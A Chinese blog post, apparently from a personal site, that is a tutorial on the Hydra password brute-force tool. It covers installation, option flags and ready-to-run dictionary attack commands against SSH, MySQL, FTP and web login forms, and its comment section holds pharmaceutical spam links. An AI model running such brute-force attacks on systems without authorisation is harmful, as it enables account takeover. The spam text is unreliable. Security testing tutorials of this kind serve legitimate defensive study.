Linux环境下在线破解神器,Hydra详解密码破解

政林 2020-11-29 1345浏览 1条评论
首页/正文
分享到: / / / /

Linux环境下在线破解神器,Hydra详解密码破解

Hydra是由著名的黑客组织THC开发的一款开源暴力破解工具,几乎支持所有协议的在线密码破解, 可以对多种服务的账号和密码进行爆破,包括Web登录、数据库、SSH、FTP、POP3等服务,其密码能否被破解关键在于字典是否足够强大。对于社会工程型渗透来说,有时能够得到事半功倍的效果。本文仅从安全角度去探讨测试,其主要目的是方便安全研究人员检测服务器是否安全。

Hydra支持Linux、Windows、Mac平台安装和部署,部署方法和步骤也非常简单,其中Kali Linux中自带Hydra。Hydra官 网:http://www.thc.org/thc-hydra

Linux系统下安装部署Hydra

#官网或github下载Hydra软件包;

wget --no-check-certificate https://www.thc.org/releases/hydra-8.1.tar.gz

wget https://github.com/vanhauser-thc/thc-hydra/archive/master.zip
#Tar
工具解压Hydra软件包;

tar zxvf hydra-8.1.tar.gz

cd hydra-8.1    #Cd切换至源代码目录;

./configure     #执行预编译Hydra;

Make          #编译;

make install    #安装;

安装完成之后,使用hydra -h,可以查看指令及其功能

hydra常用命令(注意大小写)

-R                      还原以前中止或崩溃的会话

-S                      使用SSL连接

-s                       指定非默认端口

-l                       使用登录名进行登录

-L                      使用账号字典进行破解

-p                      使用密码进行登录

-P                      使用密码字典进行破解

-e  nsr               n:空密码破解 s:使用的user作为密码破解 r:反向登录

-C                     指定所用格式为"user:password"字典文件

-M                     指定破解的目标文件,如果不是默认端口,后面跟上": port"

-o                      将破解成功的用户名:密码写入指定文件

-b                      指定文件类型(txt (default),json,jsonv1)

-f     /  -F           在找到用户名或密码时退出( -f 每个主机  -F 主机文件)

-t                       设置每个目标并行连接数(默认为16)

-T                     任务总体的并行连接数(默认为64)

-w  /-W             设置超时时间(默认为32秒) 每个线程之间连接等待时间(默认为0)

-v  / -V / -d        详细模式 / 显示login+pass 每个尝试 /  调试模式

-O                     使用老版本SSL V2和V3

-q                      不输出连接错误信息

-U                      查看 支持破解的服务和协议

server               目标ip、某个网段

service              指定服务/协议名称          

OPT                  某些模块支持附加输入

 

  1. 破解ssh格式:

hydra -L 用户名 -P 密码字典 ssh://192.168.80.107

2.当目标服务开放的端口不是默认端口时,使用 -s 进行指定。

hydra -L 用户名 -P 密码字典 ssh://192.168.80.107 -s 40

3.将破解的密码存储到ssh.txt指定文件

hydra  -L user.txt -P password.txt  ssh://192.168.3.163  -s 40 -o ssh.txt

4. 对某IP的mysql服务进行测试爆破的命令参考

hydra -L username.txt -P password.txt mysql://目标IP:mysql端口号

5. 如果需要将爆破测试的过程打印出来就加个指令-v

hydra -L username.txt -P password.txt -v mysql://目标IP:mysql端口号

hydra ip ftp -l 用户名 -P 密码字典 -e ns -vV

hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns -f ip http-get /admin/index.php

post方式提交破解web登录: hydra -l 用户名 -P 密码字典 -s 80 ip http-post-form

"/admin/login.php:username=^USER^&password=^PASS^&submit=login:sorry password"

测试案例

本文为个人学习测试、学术分享,禁止使用本文内容做破坏,如有侵权,请联系我修改或删除。并请遵守中华人民共和国法律法规、中华民族基本道德和基本网络道德规范,反对暴力、低俗等不负责任的言行。

 

点击这里给我发
消息
最后修改:2020-11-29 17:21:15 © 著作权归作者所有
如果觉得我的文章对你有用,请随意赞赏
扫一扫支付

上一篇

发表评论

评论列表

匿名用户 2022-05-09 09:12:40
Wthjqs Propecia Corpo Umano [url=https://newfasttadalafil.com/]Cialis[/url] Diabetes mellitus DMworst risk factor b. Pylssn <a href=https://newfasttadalafil.com/>Cialis</a> Viagra Online Vipps Hvidlu https://newfasttadalafil.com/ - Cialis Jkirou onco tumor oncology papillo nipplelike papillary A microscopic description of tumor cell growth.
回复